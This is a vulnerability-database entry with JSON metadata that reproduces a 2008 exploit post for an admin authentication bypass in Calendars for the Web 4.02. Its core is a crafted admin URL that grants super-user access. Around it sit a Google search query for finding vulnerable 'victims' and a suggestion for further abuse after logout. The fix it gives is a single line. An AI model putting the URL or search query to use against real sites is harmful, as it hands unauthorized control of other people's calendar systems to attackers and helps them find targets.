Search...

Calendars for the Web 4.02 Admin Auth Bypass Vulnerability

2008-10-17T00:00:00

ID SSV:9744
Type seebug
Reporter Root
Modified 2008-10-17T00:00:00

Description

No description provided by source.

                                        
                                            
                                                *******************************************************
*Exploit discovered by SecVuln from http://secvuln.com*
*Come join our clan!                                  *
*contact secvuln@secvuln.com                          *
*******************************************************

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Author == SecVuln
Version == 4.02
Software == Calendars for the web by great hill corporation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Calendars for the web has a vulnerability in the administration page.
The page saves the past session, so that anyone navigating to the page has
admin access.

Exploit:

Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe

After attack:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&amp;vt=6&amp;cmd=900&amp;act=0&amp;dd=2008;10;03;12;00;00;&amp;app=0&amp;format=21x05i9r9s|SnriTmOdoaT&amp;lastcmd=0

Example:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&amp;vt=6&amp;cmd=900&amp;act=0&amp;dd=2008;10;03;12;00;00;&amp;app=0&amp;format=21x05i9r9s|SnriTmOdoaT&amp;lastcmd=0

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
how to fix: set time out for login to five minutes    !
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

A Google query can find a couple pages of victims:  inurl:calweb/calweb.exe

Further hacks: if they disable the timeout you can still log in right after
they log out... You could probaly do something with that
Also the 0 at the ending is the administrator (super user) id.

/////////////////////////////////////////////////////////////////
I take no responsability for the misuse of the information.//////
Author will not be held liable for any damages             //////
COME CHECK MY SITE OUT WWW.SECVULN.COM                     //////
////////////////////////////////////////////////////////////////

JSON Vulners Source

Initial Source

{"sourceData": "\n *******************************************************\r\n*Exploit discovered by SecVuln from http://secvuln.com*\r\n*Come join our clan! *\r\n*contact secvuln@secvuln.com *\r\n*******************************************************\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nAuthor == SecVuln\r\nVersion == 4.02\r\nSoftware == Calendars for the web by great hill corporation\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nCalendars for the web has a vulnerability in the administration page.\r\nThe page saves the past session, so that anyone navigating to the page has\r\nadmin access.\r\n\r\nExploit:\r\n\r\nBefore attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe\r\n\r\nAfter attack:\r\ntarget.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0\r\n\r\nExample:\r\ntarget.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\nhow to fix: set time out for login to five minutes !\r\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nA Google query can find a couple pages of victims: inurl:calweb/calweb.exe\r\n\r\nFurther hacks: if they disable the timeout you can still log in right after\r\nthey log out... You could probaly do something with that\r\nAlso the 0 at the ending is the administrator (super user) id.\r\n\r\n/////////////////////////////////////////////////////////////////\r\nI take no responsability for the misuse of the information.//////\r\nAuthor will not be held liable for any damages //////\r\nCOME CHECK MY SITE OUT WWW.SECVULN.COM //////\r\n////////////////////////////////////////////////////////////////\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-9744", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-9744", "type": "seebug", "viewCount": 1, "references": [], "lastseen": "2017-11-19T21:24:21", "published": "2008-10-17T00:00:00", "cvelist": [], "id": "SSV:9744", "enchantments_done": [], "modified": "2008-10-17T00:00:00", "title": "Calendars for the Web 4.02 Admin Auth Bypass Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2017-11-19T21:24:21", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T21:24:21", "rev": 2}, "vulnersScore": 0.0}, "immutableFields": []}